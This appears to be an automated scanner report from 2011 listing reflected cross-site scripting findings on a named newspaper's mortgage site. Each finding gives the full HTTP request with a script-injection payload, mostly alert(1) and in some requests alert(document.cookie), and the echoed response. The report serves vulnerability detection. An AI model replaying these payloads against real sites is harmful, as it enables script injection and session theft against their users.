The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b243<script>alert(1)</script>b89f925ed73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:07:56 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:07:56 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a614"><script>alert(1)</script>e492f5d219d was submitted in the REST URL parameter 1. This input was echoed as 4a614\"><script>alert(1)</script>e492f5d219d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(14a614"><script>alert(1)</script>e492f5d219d HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:17 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:18 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(14a614\"><script>alert(1)</script>e492f5d219dfeed/" /> ...[SNIP]...
4.389. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/feeda71cd%2522%253E%253Cscript%253Ealert(1
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee1f2"><script>alert(1)</script>14894bf18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee1f2\"><script>alert(1)</script>14894bf18ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2"><script>alert(1)</script>14894bf18ef=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:13 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62689
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2\"><script>alert(1)</script>14894bf18ef=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efa0"><script>alert(1)</script>c5d2576f89d was submitted in the REST URL parameter 1. This input was echoed as 2efa0\"><script>alert(1)</script>c5d2576f89d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0"><script>alert(1)</script>c5d2576f89d HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0\"><script>alert(1)</script>c5d2576f89dfeed/" /> ...[SNIP]...
4.391. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19724"><script>alert(1)</script>5a15440a445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19724\"><script>alert(1)</script>5a15440a445 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724"><script>alert(1)</script>5a15440a445=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:46 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... el="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724\"><script>alert(1)</script>5a15440a445=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7804f"><script>alert(1)</script>b31526e044f was submitted in the REST URL parameter 1. This input was echoed as 7804f\"><script>alert(1)</script>b31526e044f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files7804f"><script>alert(1)</script>b31526e044f HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:20 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:20 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files7804f\"><script>alert(1)</script>b31526e044ffeed/" /> ...[SNIP]...
4.393. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/files
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcea"><script>alert(1)</script>d63783f7e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bcea\"><script>alert(1)</script>d63783f7e5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files?3bcea"><script>alert(1)</script>d63783f7e5a=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:16 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:16 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files?3bcea\"><script>alert(1)</script>d63783f7e5a=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f7c"><script>alert(1)</script>5e4882fdc7d was submitted in the REST URL parameter 1. This input was echoed as 12f7c\"><script>alert(1)</script>5e4882fdc7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b7a"><script>alert(1)</script>df3c8a873d1 was submitted in the REST URL parameter 2. This input was echoed as 17b7a\"><script>alert(1)</script>df3c8a873d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92232"><script>alert(1)</script>8606eb47764 was submitted in the REST URL parameter 3. This input was echoed as 92232\"><script>alert(1)</script>8606eb47764 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d1"><script>alert(1)</script>8572d6a55e6 was submitted in the REST URL parameter 1. This input was echoed as 766d1\"><script>alert(1)</script>8572d6a55e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /766d1"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.css HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:01:22 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:01:23 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/766d1\"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1fb8"><script>alert(1)</script>a22401a108a was submitted in the REST URL parameter 1. This input was echoed as e1fb8\"><script>alert(1)</script>a22401a108a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e1fb8"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.js HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:01:13 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:01:14 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62657
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/e1fb8\"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.jsfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf114"><script>alert(1)</script>95836e536ce was submitted in the REST URL parameter 1. This input was echoed as cf114\"><script>alert(1)</script>95836e536ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cf114"><script>alert(1)</script>95836e536ce/plugins/democracy/style.css HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:01:10 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:01:11 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/cf114\"><script>alert(1)</script>95836e536ce/plugins/democracy/style.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62930"><script>alert(1)</script>7b7b2ccc4d6 was submitted in the REST URL parameter 1. This input was echoed as 62930\"><script>alert(1)</script>7b7b2ccc4d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /62930"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.css HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:01:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:01:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/62930\"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7f3"><script>alert(1)</script>dcab4cc6610 was submitted in the REST URL parameter 1. This input was echoed as ce7f3\"><script>alert(1)</script>dcab4cc6610 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ce7f3"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2 HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:01:57 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:01:58 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ce7f3\"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f534"><script>alert(1)</script>e883ec4e0ce was submitted in the REST URL parameter 1. This input was echoed as 3f534\"><script>alert(1)</script>e883ec4e0ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3f534"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xml HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:07:31 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:07:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/3f534\"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xmlfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86904"><script>alert(1)</script>1d2a8825119 was submitted in the REST URL parameter 1. This input was echoed as 86904\"><script>alert(1)</script>1d2a8825119 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xmlrpc.php86904"><script>alert(1)</script>1d2a8825119?rsd HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:07:42 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:07:42 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/xmlrpc.php86904\"><script>alert(1)</script>1d2a8825119?rsdfeed/" /> ...[SNIP]...
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacc4"%3balert(1)//bc4341ec3d3 was submitted in the lang parameter. This input was echoed as dacc4";alert(1)//bc4341ec3d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
